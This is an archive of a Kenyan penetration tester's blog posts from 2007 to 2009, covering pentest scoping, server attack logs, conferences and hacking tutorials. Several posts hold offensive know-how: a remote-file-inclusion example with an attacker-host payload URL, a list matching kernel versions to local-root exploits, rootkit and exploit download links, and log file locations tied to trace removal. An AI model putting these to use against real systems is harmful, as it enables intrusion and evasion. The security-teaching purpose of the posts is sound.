This a bit hilarious provided that these guys were doing a security assessment for the company and i expected such a company like KPMG to be aware of the security assessment factors and which services are offered during such an engagement.

THE FACTORS

So which factors does a client need to look into before taking in a Security Assessment:
a)Penetration testing External or Internal
b)Durations, how many times do you need the service, annually, semi-annually?
c)Last but not least, which security assessment service do you need.

Before we go down to some explanations, during a presentation at KRA i did explain the difference between a Vulnerability Assessment and a Penetration Test. To make that statement short, a penetration test is the actual outcome after a vulnerability assessment. In short a penetration test is the actual hands on confirmation of a vulnerability picked up during a Vulnerability Assessment therefore its a VA logical conclusion.

EXTERNAL AND INTERNAL TESTING

During a test, you might choose if you want the pentest to be performed outside your network from a remote site or you want the engineers to be in the network. When its performed externally, the engagement is taken inform of an outsider Blackhat who is supposed to bypass your firewall and any device on your perimeter from the internet. In such kind of test, the testers are not given any IP ranges, no DNS and no users, in short, no information, they have to covertly collect it and perform as much intelligence as they can before picking their prime targets. This test is commonly known as Blackbox pentesting.

The internal testing, this is carried more of like an inside threat. Someone who is already behind the perimeter, who has much info about the network and the organization. Here the testers will try to use social engineering, privilege escalation, exploitation etc.

DURATIONS, HOW MANY TIMES DO YOU NEED THE SERVICE, ANNUALLY, SEMI-ANNUALLY?

This may be considered by the security team in an organization that needs this service and also from the consultants perspective. The factors may include:
a) Threat Intelligence
b) Security Incidents (scan, bruteforces, hack attempts, DOS)
c) Insiders
d) Business espionage
e) Perimeter devices and applications e.g Portals, may need external blackbox pentests
d) Application and system changes including addition of clients and employees

WHICH SECURITY SERVICE DO YOU NEED?

One thing I have noticed with most of the security vendors in Africa is that they come with crazy names for their products that leaves customers wondering which to take and get up tricked into non service commitment. When a client asks for a security assessment, or an organization which needs one, this is what to look into as the services needed.

a) Vulnerability Assessment

b) Penetration testing

c) Web Application Assessment

d) Physical Security Assessment

This is just to mention the most important ones. I will be writing a brief blog entry for each of them soon.

./Chuks

Hacking in EA just grew bigger

2009-08-17T23:31:00.005+03:00

Recently, after the last few posts in sec forums, though the hate and the mail list trolling, i realized a sudden increase of attacks on some of the servers i man security-wise. The attacker was going mostly for the webserver keeping me awake on Friday, through Saturday and i had to get a little of sleep on Sunday.

One crazy initiative is that the guy was trying to look for links which he can use to gain access to one of the sites.

41.223.57.73 - - [16/Aug/2009:16:01:57 +0300] "GET /www2/admin HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.2; af; rv:1.9.0.13) Gecko/2009073022 Firefox/3.0.13"
41.223.57.76 - - [16/Aug/2009:16:02:16 +0300] "GET /www2/admin.html HTTP/1.1" 404 280 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.2; af; rv:1.9.0.13) Gecko/2009073022 Firefox/3.0.13"
41.223.57.74 - - [16/Aug/2009:16:03:13 +0300] "GET /admin.html HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.2; af; rv:1.9.0.13) Gecko/2009073022 Firefox/3.0.13"
41.223.57.75 - - [16/Aug/2009:16:03:43 +0300] "GET /administrator HTTP/1.1" 404 278 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.2; af; rv:1.9.0.13) Gecko/2009073022 Firefox/3.0.13"
41.223.57.74 - - [16/Aug/2009:16:03:55 +0300] "GET /administrator/backup HTTP/1.1" 404 285 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.2; af; rv:1.9.0.13) Gecko/2009073022 Firefox/3.0.13"
41.223.57.78 - - [16/Aug/2009:16:04:07 +0300] "GET /administrator/login.php HTTP/1.1" 404 288 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.2; af; rv:1.9.0.13) Gecko/2009073022 Firefox/3.0.13"
41.223.57.76 - - [16/Aug/2009:16:04:28 +0300] "GET /admin.php HTTP/1.1" 404 274 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.2; af; rv:1.9.0.13) Gecko/2009073022 Firefox/3.0.13"
41.223.57.75 - - [16/Aug/2009:16:05:29 +0300] "GET /vpn_administration HTTP/1.1" 404 283 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.2; af; rv:1.9.0.13) Gecko/2009073022 Firefox/3.0.13"
41.223.57.77 - - [16/Aug/2009:16:06:06 +0300] "GET /vpn_administrator HTTP/1.1" 404 282 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.2; af; rv:1.9.0.13) Gecko/2009073022 Firefox/3.0.13"
41.223.57.73 - - [16/Aug/2009:16:10:13 +0300] "GET /www2/administrator HTTP/1.1" 404 283 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.2; af; rv:1.9.0.13) Gecko/2009073022 Firefox/3.0.13

This was not even as bad as sshd attack which took 47 to 50 hours of straight bruteforce. He was trying usernames like admin, admin_companyname and companyname and all these are not on default sshd port. A snipet here.

Aug 15 01:10:01 xxxxx sshd[3834]: pam_unix(sshd:auth): authentication failure; logname= uid=0 e uid=0 tty=ssh ruser= rhost=41.223.57.74
Aug 15 01:10:01 xxxxx sshd[3834]: pam_succeed_if(sshd:auth): error retrieving information about user admin
Aug 15 01:10:02 xxxxx sshd[3834]: Failed password for invalid user admin from 41.223.57.74 port 48129 ssh2
Aug 15 01:10:17 xxxxx sshd[3834]: pam_unix(sshd:auth): check pass; user unknown
Aug 15 01:10:17 xxxxx sshd[3834]: pam_succeed_if(sshd:auth): error retrieving information about user admin
Aug 15 01:10:19 xxxxx sshd[3834]: Failed password for invalid user admin from 41.223.57.74 port 48129 ssh2

The bruteforce goes on through Saturday to Sunday......
Aug 16 00:03:03 xxxxx sshd[7758]: Failed password for invalid user admin_xxxxx from 41.223. 57.72 port 57217 ssh2
Aug 16 00:03:09 xxxxx sshd[7758]: pam_unix(sshd:auth): check pass; user unknown
Aug 16 00:03:09 xxxxx sshd[7758]: pam_succeed_if(sshd:auth): error retrieving information about user admin_xxxxx
Aug 16 00:03:11 xxxxx sshd[7758]: Failed password for invalid user admin_xxxxx from 41.223. 57.72 port 57217 ssh2
Aug 16 00:04:52 xxxxx sshd[7768]: Invalid user admin_xxxxx from 41.223.57.72

This is just to warn the hacker upto this mischief, just know i am watching you alot and if you have never seen such crazy logs in your perimeter machines, please check again.

All the above IPs are from Zain Modems.

./Chuks

Incoming SecureICT!!!!

2009-08-08T16:16:00.003+03:00

Okey guys, you remember the http://secureict.co.ke/. we are getting ready for the Conference. See you guys there, am doing Wireless Penetration testing presentation.

Good weekend.

./Chuks

Afr0-w00t convention announced in the Forums

2009-07-12T19:02:00.009+03:00

Hi. If you are member of Security Forums, Kictanet, Skunksworks, you may have seen the call for papers for Afr0-w00t hackers convention. This is going to be the first of a kind in Kenya. http://bit.ly/NSzbM

We are expecting papers from most of the information security experts in Africa and Kenya mostly coz it will held in Kenya, Nairobi.

This year, we will make this convention a different one from any other information security conference ever done in Kenya. This is due to the fact that, most of the topics this year will be more on hardcore hacking and penetration seen in Nairobi.

We will also set up a contest, Hacking the Box. More information will posted in the security mailist in my.co.ke.

./Chuks

is Kenya Safe from a Cyber Attack

2009-07-01T14:00:00.004+03:00

Hi guys.
We have currently been discussing at The Security Forum about a post we found online on Cyber attacks in Kenya and if Kenya is Safe incase of such a launch.

Most of the Discussion are here:

http://lists.my.co.ke/pipermail/security/2009-June/000283.html

http://lists.my.co.ke/pipermail/security/2009-June/000285.html

More found, http://lists.my.co.ke/pipermail/security/2009-July/000286.html

And another post from tyrus, http://lists.my.co.ke/pipermail/security/2009-July/000289.html

What do u guys think? What are the major utilities if shutdown, can affect the ways of Kenyan?

./Chuks

April heated debate.[Security Forum] Lab Pentesting versus Real World tests

2009-05-03T00:15:00.004+03:00

April heated debate was on Lab pentesting versus Real World testings where alot of the pentesters felt that you get to learn a lot from testing real and live server rather than Lab networks where you are aware of everything.

There was also this proposal by Simiyu that he come up about a competion, "

blue Team:
All the sys admins, web developers on the skunkworks list.
They get to install and  run their apps on some local network.

Red Team:
Pen testers from Kenya, from the list and as well as those who are not on the list.
They get to try and break into the set up network.

At the end of the day both teams sit down and discuss on the vulnerabilities discovered
and how to prevent such attacks in real life scenarios and the losers buy lunch of course ;)"

Reply guys

./Chuks

MOVED THE SECURITY FORUM TO A NEW HOST

2009-04-19T13:48:00.004+03:00

Hi guys, we have moved the First Kenya Information Security Forum to a new host, maintained by penguin labs.

For more info, check this out, http://lists.my.co.ke/pipermail/security/2009-April/date.html#start and to join please visit http://lists.my.co.ke/cgi-bin/mailman/listinfo/security

./Chuks

security forum is back

2009-04-08T04:05:00.002+03:00

Morning Lions and lioness'.

For the whole of last week, we have had the security forum down due to a server crash and we lost most of the subscriptions. Been working on this list for some hours now to make sure any member who had subscribed gets back in as i work on my official day to night works, LOL!

Anyway, hope to see some replies to this post, thank you for your patience. This has been a good learning resource for us. Am soon going to index the mailist on my new domain as soon as i can due to that we need archives.

If you had a member friend who tried to register last week and failed, tell them to try it again from now. Good week and safe holidays.

To register just send a black email to security-subscribe@openworld.co.ke

{EDITED} We moved to a new host, check http://lists.my.co.ke/cgi-bin/mailman/listinfo/security

./Chuks

research site down

2009-03-30T15:16:00.001+03:00

For those trying to reach www.kamongo.co.ke, please just try it through the IP, http://41.206.42.174/ since my domain is down, until further notice.

./Chuks

insecure webapps

2009-02-27T00:35:00.002+03:00

We had this discussion that a certain server was certainly so secure, and the owners stated that 10 million was used to setup the portal. Out of curiosity, a research pentest was done on this portal. To download the paper, http://www.kamongo.co.ke/chuksjonia/info/home_insecurity/TheHomecoke.pdf

/Chuks

Some of The Conference Docs

2009-02-03T19:14:00.002+03:00

Hey good people. Some of the conferences i have done previously, presentations are hosted in this site(www.kamongo.co.ke/chuksjonia/info). You can download for references at your own time.

/Chuks

A perfect pentest example

2009-01-27T19:53:00.002+03:00

1. Information Gathering Phase (find the company's website,
emails, employees (and their blogs etc) and anything else related)
2. Network Discovery Phase (find the internal and external
network(s) of the company if possible, with help from the
information above)
3. Service Discovery Phase (find all services belonging to the
company thus the versions, ftp, http and so on.)
4. Vulnerability Match Phase (see if it is possible to find any
holes directly in the applications.)
5. HTTP-Vulnerability Phase (check out all http-services belonging
to the company, check for everything ranging from SQL injection to
XSS)
6. Gaining Access (see if it is possible to gain full or partially
access to their systems. Social Engineering might work.)
7. Escalation of Privileges (if partial access was gained,
escalate privileges in order to gain root.)
8. System/Network Browsing (find other nodes on the network if
possible, if so begin from service discovery phase or information
gathering phase.)
9. Gaining Internal Access (if it was possible to gain internal
access, then the job is almost done. If not, we will need to do it
here. This could be achieved with XSS, Trojans, Eavesdropping,
Phishing or by Cracking the wireless network if they have such.
Even Social Engineering can work in this phase))
10. Backdooring Phase (put a rootkit or w/e i like, as long as it
isn't detectable. This isn't necessary for most companies.)
11. Removal of Traces (if needed, then remove all traces possible.)

All they best

/Chuks

Ummunities' DR Linux Rootkit released

2008-09-04T13:11:00.003+03:00

Hi guys.

Canvas folks just released Dr Linux rootkit with nice stealth creation, eg

a) Hide processes
b) Hide network sockets
c) Hide files
d) Get a remote MOSDEF Node (via hidden userland-backdoor)

All of this happening to the end user.

Download link: http://www.immunityinc.com/downloads/linux_rootkit_source.tbz2

wget.......

/Chuks

SECURITY DEPARTMENTS

2008-08-22T20:39:00.003+03:00

Breaches are always good for companies' networks and systems (they make you wake up), but failure comes when you don't have a security department which should look into this, especially an Incident Response Team. Does the Kenya Police have that?

These security teams should be very interested in Security and they need to be people who have Hacking experience before and do continue trying to bypass security, coz its in their blood. These guys will never ignore a breach.

Protection is a cost, discovery is another cost and remediation is another expensive cost.

/Chuks

Scope (Pentest)

2008-07-14T22:19:00.003+03:00

I been doing alot of pentest lately, and alot of them involved Banks and Mobile Network Providers here in Kenya. What amazed me is that some of the admins knew about scanning system and they thought that was enough. You just lauch Nessus, or Nmap like E and Y guys do, and you write up that the pentest is over, maybe after 3 days. Nooooooo, its doesn't run like that brothers.

After u find the vulnerability, you need to tactically exploit the host, and bypass the IDS signatures, penetrate through to secure networks, crack passwords and even access files that are restricted. How you do it, the duration, every step depends on the ROE and the scope of the pentest as discussed. You may have found some XSS holes and the next day as you get in and get down with your gear, you find that, its just got patched, and the other pages are behind the login page.

One thing you need to stress to the administration is that, the scanners wont see beyond, like an exploitation phase should.

/Chuks

Valzsmith post on seclist

2008-07-14T22:11:00.001+03:00

Hey, not posted for a while.

This is a mail Valzsmith, one of the creators of BackTrack , wrote.

From: val smith <valsmith_at_offensivecomputing.net>
Date: Fri, 25 Apr 2008 11:09:39 -0600

I'll have to be honest, I don't really WANT Microsoft to change their
patch methodology, even if the dramatic (probably incorrect)
conclusions people seem to be drawing from this paper are true. Bear
with me for a moment and Ill explain why. Lets be honest here, there
are researchers (many on this list) who can rapidly find and exploit
vulnerabilities. Patches help speed things up but BinDiff (and
similar) things have been available for many years and the people who
can write exploits understand this process and those with a financial
stake in it have automated much of the process by now. If patches were
to be obfuscated, or the process changed how long would it really take
for someone to circumvent it? A binary has to exist somewhere at some
point right? Someone smart enough will eventually send input to it, or
reverse it or accidentally crash it eventually.

Many of us make use of exploits and vulnerabilities in some way for a
living whether we are pen testers, IDS sig developers, vuln
researchers, framework builders or whatever. At this point security is
such a tangled, many layered labyrinth that I no longer possess the
self righteous fury required to shout from the pulpit: "Patch your
systems! Configure security! Use an IDS! Educate your users!"

I'm in it for the fun.

There I said it. If everyone did everything securely, I wouldn't have
much to do and I'd have to pour coffees or flip burgers for a living.
I like showing up for a pen test and finding unpatched boxes, or users
sharing admin passwords. I love finding web apps with null byte file
inclusion bugs, or passwordless ssh keys with sudo permissions on
every server. Its FUN. I suspect other security researchers have
reached this conclusion (even if they haven't admitted it to
themselves yet) that security is probably too hard a problem to
"solve" and all our ranting really doesn't make anyone more secure in
the long run. At this point, broken things are fun and we just want to
play and thankfully people are willing to pay for it. I don't mind if
you continuously make it just a little bit harder, just to keep it
interesting, but don't take away my exploits please! ;)

V.

Its said like it is.

/Chuks

Penetration testing

2008-06-03T14:25:00.001+03:00

Black, white and gray box tests provide different approaches for assessing the security of your Network and applications. Each approach has specific advantages and disadvantages, and selecting a testing approach needs to be done based on the time and resources available, as well as the overall goals of the test being performed.
You can assume most real-world attackers will approach systems from a black-box perspective. But to better account for the advantage attackers have with regard to time and resources, and to avoid relying on security through obscurity, gray and white box tests can be appropriate approaches as well. Maximizing the security value of testing approaches when you have limited time and resources requires careful test planning and a thorough understanding of how testing constraints affect the completeness of testing results.
Let's take a look at the differences between the three tests.

Black box testing
Black box testing refers to testing a system without having specific knowledge to the internal workings of the system, no access to the source code, and no knowledge of the architecture.
In essence, this approach most closely mimics how an attacker typically approaches applications. However, due to the lack of internal application knowledge, the uncovering of bugs and/or vulnerabilities can take significantly longer. Black box tests must be attempted against running instances of applications, so black box testing is typically limited to dynamic analysis such as running automated scanning tools and manual penetration testing.

White box testing
White box testing which is also known as clear box testing, refers to testing a system with full knowledge and access to all source code and architecture documents. Having full access to this information can reveal bugs and vulnerabilities more quickly than the "trial and error" method of black box testing. Additionally, you can be sure to get more complete testing coverage by knowing exactly what you have to test.
However, because of the sheer complexity of architectures and volume of source code, white box testing introduces challenges regarding how to best focus the testing and analysis efforts. Also, specialized knowledge and tools are typically required to assist with white box testing, such as debuggers and source code analyzers
In addition, if white box testing is performed using only static analysis techniques using the application source code and without access to a running system, it can be impossible for security analysts to identify flaws in applications that are based on system misconfiguration or other issues that exist only in a deployment environment of the application in question.

Gray box testing
When we talk about gray box testing we're talking about testing a system while having at least some knowledge of the internals of a system. This knowledge is usually constrained to detailed design documents and architecture diagrams. It is a combination of both black and white box testing, and combines aspects of each.
Gray box testing allows security analysts to run automated and manual penetration tests against a target application. And it allows those analysts to focus and prioritize their efforts based on superior knowledge of the target system. This increased knowledge can result in more significant vulnerabilities being identified with a significantly lower degree of effort and can be a sensible way for analysts to better approximate certain advantages attackers have versus security professionals when assessing applications.

/Chuks

Social Engineering The Act

2008-04-07T17:45:00.000+03:00

I will be posting all my information on social engineering as i get it and write it. This thread may look crappy now but it will get alot better.

Section one:
Its all about your act. You must practise who you are and what you wil do. Wether you prefer to act like a reformed gentalmen when you are acting smooth with a lady to get her to tell you somethign or if you are a enraged customer it just matters. Some poeple use a double persona as in the act as two different people.

Section 2:
I cant stress it enough practise practise practise. You need to atleast practise what you will do and how you will act inside your head.

Section three:
Keywords are important so do research. Such as at target if you want to return something that you got from another store even you jsut say it was a gift you recieved and the recipt wasnt put in the bag by the employe. Now this plays on 2 things One Target has a policy for returnign items and 2 it was thier fualt.

/Chuks

OSCP

2008-03-15T15:46:00.000+03:00

Hi guys

I got certified for C.E.H .last year and C.P.T.P. too. This March, I'm doing Offensive Security Certified Professional. I think this is the perfect course for anybody who want to be a pentester by profession. We are in Module 5, on arp spoofing and we are being shown some tactics with scripts like file2cable which proofs to be very effective in a switched network.

C.E.H. according to what i found out is more of script kiddles, where u get a tool and u just execute it.

O.S.C.P. is the course, good luck guys.

/Chuks

Hacker Myths

2008-03-04T19:46:00.001+03:00

All the perceptions of hackers and their portrayal in movies and entertainment have lead to the development of “hacker myths.” These myths involve common misconceptions about hackers and can lead to misconceptions about how to defend against them. Here we have attempted to identify some of these myths and dispel common misconceptions.

Hackers are a well-organized, malicious group.

There is indeed a community within the hacker underground. There are hacking-related groups such as Alt-2600 and Cult of the Dead Cow, IRC “hacking” channels, and related newsgroups. However, these groups are not formed into a well-organized group that targets specific networks for hacking. They share a common interest in methods for avoiding security defenses and accessing restricted information.

If you build it, they will come; and

It is safe if you hide in the tall grass.

Both of these myths represent opposing views on the probability of being hacked. Myth 2 is indicative of the view that once an Internet presence is established, malicious hackers will begin to attempt a compromise. Myth 3 expresses the opinion that there are so many Web sites around that if you just do not make a lot of noise and do not have one of the truly big sites, publicity-seeking hackers will not bother to go after you.
The truth lies somewhere in the middle. You will probably be scanned by users with malicious intent, but it may not happen the moment your systems go online. Some scans will be by groups trying to get an idea of how many Web sites are using a particular piece of software. Others are unethical (but legal) system reconnaissance.
A good plan is to develop a security posture that balances the risk of system compromise with the costs of implementing and maintaining security measures. This will allow you to sleep at night. While you may not stamp out the chance of compromise entirely, you will have done what you can to prevent and limit the compromise without killing your budget.

Security through obscurity.

Myth 4 implies that because you are small and unknown or you hide a vulnerability, you are not at risk. For example, according to this myth, if you create a Web site but give the URL only to your friends, you don't have to worry about it being attacked. Another example we have seen is the creation of a backdoor around a firewall by putting a second network card in a DMZ system and directly connecting it to the internal network. People using such a strategy think that because they have hidden the weakness, no one will find it and the organization is safe. However, security through obscurity does not work. Someone will find the weakness or stumble upon it and the systems will be compromised.

All hackers are the same.

This myth is borne out of a lack of knowledge among the general public about the hacker community. All hackers are not the same. As mentioned above, different hackers focus on different technologies and have different purposes and skill levels. Some hackers have malicious intent; some don't. They are not all teenagers who spend far too much time in front of a computer. Not all hackers are part of a group that defaces Web sites and creates and distributes hacking tools. The range among hackers is great, and you need to defend against them all.

/Chuks

BUSY WITH TRAINING

2008-01-30T12:28:00.000+03:00

Hi guys. I haven't been posting due to the fact i have been doing some training and alot of field work lately too.

New stuff is coming in too this coming Feb, so keep tuned.

If u wish to be in any of my trainings, you can contact me with the number posted in my profile. Training is as follows.

Assessing and Securing Wireless Networks

Few fields are as complex as wireless security. This course breaks down the issues and relevant standards that affect wireless network administrators, auditors, and information security professionals. With hands-on labs and instruction from industry wireless security experts, you will gain an intimate understanding of the risks threatening wireless networks. After identifying risks and attacks, we'll present field-proven techniques for mitigating these risks, leveraging powerful open-source and commercial tools for Linux and Windows systems.

Network Penetration Testing and Ethical Hacking

Find Security Flaws Before the Bad Guys Do

Security vulnerabilities such as weak configurations, unpatched systems, and botched architectures continue to plague organizations. Enterprises need people who can find these flaws in a professional manner to help eradicate them from our infrastructures. Lots of people claim to have penetration testing, ethical hacking, and security assessment skills, but precious few can apply these skills in a methodical regimen of professional testing to help make an organization more secure. This class covers the ingredients for successful network penetration testing to help attendees improve their enterprise's security stance.

Hacker Techniques, Exploits & Incident Handling

If your organization has an Internet connection and one or two disgruntled employees (and whose doesn't!), your computer systems will get attacked. From the five, ten, or even one hundred daily probes against your Internet infrastructure to the malicious insider slowly creeping through your most vital information assets, attackers are targeting your systems with increasing viciousness and stealth.

By helping you understand attackers' tactics and strategies in detail, giving you hands-on experience in finding vulnerabilities and discovering intrusions, and equipping you with a comprehensive incident handling plan, the in-depth information in this course helps you turn the tables on computer attackers. This course addresses the latest cutting-edge insidious attack vectors and the "oldie-but-goodie" attacks that are still so prevalent, and everything in between. Instead of merely teaching a few hack attack tricks, this course includes a time-tested, step-by-step process for responding to computer incidents; a detailed description of how attackers undermine systems so you can prepare, detect, and respond to them; and a hands-on workshop for discovering holes before the bad guys do. Additionally, the course explores the legal issues associated with responding to computer attacks, including employee monitoring, working with law enforcement, and handling evidence.

Advanced Web Application Penetration Testing

Assess Your Web Apps in Depth

Web applications are a major point of vulnerability in organizations today. Web app holes have resulted in the theft of millions of credit cards, major financial and reputational damage for hundreds of enterprises, and even the compromise of thousands of browsing machines that visited web sites altered by attackers. In this class, you'll learn the art of exploiting web applications so you can find flaws in your enterprise's web apps before the bad guys do. Through detailed, hands-on exercises and training from a seasoned professional, you will be taught the four-step process for web application penetration testing. You will inject SQL into back-end databases, learning how attackers exfiltrate sensitive data. You will utilize Cross Site Scripting attacks to dominate a target infrastructure in our unique hands-on laboratory environment. And, you will explore various other web app vulnerabilities in-depth, with tried-and-true techniques for finding them using a structured testing regimen. You will learn the tools and methods of the attacker, so that you can be a powerful defender.

OTHERS

Others like CEH Certified Ethical hacking and CPTP Certified Penetration Testing Professional, can be done as evening classes due to that they are very long and can't be finished in a weeks time.

Cheers,

/Chuks

SOME BASIC REMOTE FILE INCLUSION

2007-11-07T02:19:00.000+03:00

This also called RFI, its where the attacker tries to inject his own php code inside your php app. If an attacker is able to hit this then he could be able to execute any kind of code he wishes to on this webserver.

In a simple example, if the site is trying to do something like page=page.html to work out which page should be displayed, the code may look something like this:

$file =$_GET['page']; //The page we wish to display
include($file);
?>

If this vulnerability is experienced, this means the intruder can try to make the the code to try and run and pass down to the eg like this.

www.target.co.ke?page=www.h4x3r.co.ke/evil.txt?

So the vulnerable server will try to execute:

$file ="http://www.h4x3r.co.ke/evil.txt?"; //$_GET['page'];
include($file); //$file is the attackers script
?>

So the intruder has this executed. As u can see the attack script is having a .txt but we do put a question mark behind so as to be passed to the vulnerable website. Also we cant use a .php extension due to that we dont want the script to be executed on the attack machine.

This is the basic part on how to do it, u can google for more and advanced steps to undertake these attack, how to bypass restrictions and other ways like backconnecting and binding to the server remote shell interaction. Although this kind of attacks is dieing, u will still find it in alot of servers out there due to careless programming and luck of security audits on these servers. Also admins are to blame due to that they arent aware of how hacks are done and are new to these methods intruders use to pick gates, jump in and scroll in the server

Peace to all,

All the best

/Chuks

REMOTE CODE EXECUTION

2007-11-06T16:49:00.000+03:00

This is where the intruder uses a vulnerability on your scripts to attack a webserver and executes arbitary commands. We can have a few snapshots of how it can be done. Check here.

Note that this is a very old bug and alot of servers are already patched against them but u will find a number of servers and sites still vulnerable to this.

Remote Code Execution also leads to others attacks, Like Local File Inclusions, Remote File Inclusions due to a method we call Gratuitous File Uploads.

Good week,

/Chuks

SOME LIST OF KERNEL LOCAL EXPLOITS

2007-09-25T00:48:00.000+03:00

This is really useful. Tells you which exploits are suited to which kernels

2.4.17
newlocal
kmod

2.4.18
brk
brk2
newlocal
kmod
km.2

2.4.19
brk
brk2
newlocal
kmod
km.2

2.4.20
ptrace
kmod
ptrace-kmod
km.2
brk
brk2

2.4.21
km.2
brk
brk2
ptrace
ptrace-kmod

2.4.22
km.2
brk2
brk
ptrace
ptrace-kmod

2.4.22-10
loginx
./loginx

2.4.23
mremap_pte

2.4.24
mremap_pte
Uselib24

2.4.25-1
uselib24

2.4.27
Uselib24

2.6.0
REDHAT 6.2
REDHAT 6.2 (zoot)
SUSE 6.3
SUSE 6.4
REDHAT 6.2 (zoot)
all top from rpm
-------------------------
FreeBSD 3.4-STABLE from port
FreeBSD 3.4-STABLE from packages
freeBSD 3.4-RELEASE from port
freeBSD 4.0-RELEASE from packages
----------------------------
all with wuftpd 2.6.0;
=
wuftpd
h00lyshit

2.6.2
mremap_pte
krad
h00lyshit

2.6.5 to 2.6.10
krad
krad2
h00lyshit

2.6.8-5
krad2
./krad x
x = 1..9
h00lyshit

2.6.9-34
r00t
h00lyshit

2.6.13-17
prctl
h00lyshit

-------------------

2.4.17 -> newlocal, kmod, uselib24
2.4.18 -> brk, brk2, newlocal, kmod
2.4.19 -> brk, brk2, newlocal, kmod
2.4.20 -> ptrace, kmod, ptrace-kmod, brk, brk2
2.4.21 -> brk, brk2, ptrace, ptrace-kmod
2.4.22 -> brk, brk2, ptrace, ptrace-kmod
2.4.22-10 -> loginx
2.4.23 -> mremap_pte
2.4.24 -> mremap_pte, uselib24
2.4.25-1 -> uselib24
2.4.27 -> uselib24
2.6.2 -> mremap_pte, krad, h00lyshit
2.6.5 -> krad, krad2, h00lyshit
2.6.6 -> krad, krad2, h00lyshit
2.6.7 -> krad, krad2, h00lyshit
2.6.8 -> krad, krad2, h00lyshit
2.6.8-5 -> krad2, h00lyshit
2.6.9 -> krad, krad2, h00lyshit
2.6.9-34 -> r00t, h00lyshit
2.6.10 -> krad, krad2, h00lyshit
2.6.13 -> raptor, raptor2, h0llyshit, prctl
2.6.14 -> raptor, raptor2, h0llyshit, prctl
2.6.15 -> raptor, raptor2, h0llyshit, prctl
2.6.16 -> raptor, raptor2, h0llyshit, prctl

compiled and .c exploits can be found here: http://meto5757.by.ru/l0c4lr00t/

PLAYING WITH SOME PHPMYADMIN

2007-09-17T14:48:00.001+03:00

Guys at nnc made more of knew progress on phymyadmin hacking. And these are their papers.

Paper:
http://nnc.unkn0wn.eu/papers/pma/phpmyadmin.txt

Sql1:
http://nnc.unkn0wn.eu/papers/pma/sql1.txt

Sql2:
http://nnc.unkn0wn.eu/papers/pma/sql2.txt

Secure your applications.

/Chuks

Log Locations

2007-08-03T17:05:00.000+03:00

Alot of guys asked me where most of the logs are kept, well the display photo on the left show logs of /var/log/secure

Well, i will update later with Windows version.
For now have this.

IRIX:
=================

/var/adm/SYSLOG
/var/adm/sulog
/var/adm/utmp
/var/adm/utmpx
/var/adm/wtmp
/var/adm/wtmpx
/var/adm/lastlog/username
/usr/spool/lp/log
/var/adm/lp/lpd-errs
/usr/lib/cron/log
/var/adm/loginlog
/var/adm/pacct
/var/adm/dtmp
/var/adm/acct/sum/loginlog
/var/adm/X0msgs
/var/adm/crash/vmcore
/var/adm/crash/unix

AIX:
=================

/var/adm/pacct
/var/adm/wtmp
/var/adm/dtmp
/var/adm/qacct
/var/adm/sulog
/var/adm/ras/errlog
/var/adm/ras/bootlog
/var/adm/cron/log
/etc/utmp
/etc/security/lastlog
/etc/security/failedlogin
/usr/spool/mqueue/syslog

SunOS:
=================

/var/adm/messages
/var/adm/aculogs
/var/adm/aculog
/var/adm/sulog
/var/adm/vold.log
/var/adm/wtmp
/var/adm/wtmpx
/var/adm/utmp
/var/adm/utmpx
/var/adm/log/asppp.log
/var/log/syslog
/var/log/POPlog
/var/log/authlog
/var/adm/pacct
/var/lp/logs/lpsched
/var/lp/logs/lpNet
/var/lp/logs/requests
/var/cron/log
/var/saf/_log
/var/saf/port/log

Linux:
=================

/var/log/lastlog
/var/log/telnetd
/var/run/utmp
/var/log/secure
/root/.ksh_history
/root/.bash_history
/root/.bash_logut
/var/log/wtmp
/etc/wtmp
/var/run/utmp
/etc/utmp
/var/log
/var/adm
/var/apache/log
/var/apache/logs
/usr/local/apache/log
/usr/local/apache/logs
/var/log/acct
/var/log/xferlog
/var/log/messages
/var/log/proftpd/xferlog.legacy
/var/log/proftpd.access_log
/var/log/proftpd.xferlog
/var/log/httpd/error_log
/var/log/httpd/access_log
/etc/httpd/logs/access_log
/etc/httpd/logs/error_log
/var/log/httpsd/ssl.access_log
/var/log/httpsd/ssl_log
/var/log/httpsd/ssl.access_log
/etc/mail/access
/var/log/qmail
/var/log/smtpd
/var/log/samba
/var/log/samba-log.%m
/var/lock/samba
/root/.Xauthority
/var/log/poplog
/var/log/news.all
/var/log/spooler
/var/log/news
/var/log/news/news
/var/log/news/news.all
/var/log/news/news.crit
/var/log/news/news.err
/var/log/news/news.notice
/var/log/news/suck.err
/var/log/news/suck.notice
/var/spool/tmp
/var/spool/errors
/var/spool/logs
/var/spool/locks
/usr/local/www/logs/thttpd_log
/var/log/thttpd_log
/var/log/ncftpd/misclog.txt
/var/log/ncftpd.errs
/var/log/auth

/Chuks

Script kiddy tutorial

2007-07-16T16:58:00.000+03:00

1. You goto milw0rm, neworder, bugtrak (and so one) and you find the latest exploit for some deamon that you know the name off, (then u would guess it must be very common).

2. You install the daemon locally, the vulnerable version and test the exploit locally, probably it's try, a hoax!!!& u'll have to reinstall your PC a dozen times before you post the code and get laughed at with the "rm -rf /" in the code.

3. You come and cry and stomp your feet in every forum on the network saying "how do i compile", after a month of so, you got yourself a .out (wtf is that???)

4. Repeat step 3 with asking what is a .out

5. Woho Your leet, time to prove it, goto step 6

6. With your locally installed vulnerable daemon and exploit ready to go, you check out the banner of the daemon, and write it down

7. You make yourself a little script that nmap a certain the port that deamon runs on and try to match the banner of the vulnerable one.

8. Find an ip range of dedicated servers, cheap ones are the best, like some dedibx because there are thousand of people that just buy them and don't do anythnig with time or update them as they have no value.

9. Scan them all NIGHT ...

10. Wake up and run your leet download and compile the exploit.

11. Get banned from all Forums, and look like a total retard.

TO BE CONTINUED...........

/Chuks

TURNING 26 TODAY

2007-07-14T16:15:00.000+03:00

Hi,

Well, i'm going to be 26 today, and i just had the best fooling ever from my friends. First they DOSed my server in the morning, then they made a stupid account in one of the forums i constantly browse and a senior member also, with a name chuksjonia-junior. Then everybody said its my kid turned hacker and he is selling hacked paypals, Lol! And ain't a father yet.

